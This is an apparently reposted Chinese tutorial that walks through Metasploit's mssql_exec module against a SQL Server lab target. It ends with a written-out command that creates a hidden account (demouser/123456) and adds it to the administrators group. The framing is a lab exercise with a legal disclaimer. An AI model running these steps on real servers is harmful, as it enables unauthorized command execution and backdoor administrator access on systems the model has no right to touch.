| 关键词: 命令 下图 cmd 目标 主机 net administrator 靶机 localgroup Metasploit |
一、课前声明1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 二、资源装备1.安装好 Kali Linux 的虚拟机一台 2.搭建好Sql server的靶机一个; 3.整装待发的小白一个。 三、 战略安排3.1 进入Metasploit(msf)渗透测试框架,如下图所示。 命令:msfconsole 3.2 利用Metasploit(msf)渗透框架对目标主机漏洞利用模块进行检索,如下图所示。 命令:search mssql_exec 3.3 如下图所示,利用检索到的漏洞利用模块。 命令:use auxiliary/admin/mssql_exec 3.4 查看需要设置的攻击参数,如下图所示。 命令:show options 3.5 设置cmd命令对目标主机进行控制,如下图所示。 3.5.1 利用cmd命令查看目标主机的用户组 命令:set CMD cmd.exe /c net user 命令:run 3.5.2 利用cmd命令在目标主机上创建新的用户,并且把账户添加到管理员组中,如下图所示。 命令:set CMD cmd.exe /c net user 用户名 密码 /add&net localgroup administrator 用户名 /add 例子:set CMD cmd.exe /c net user demouser 123456 /add&net localgroup administrator demouser /add 命令:run |
| 本文出处: https://www.toutiao.com/a6884924138096427524/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|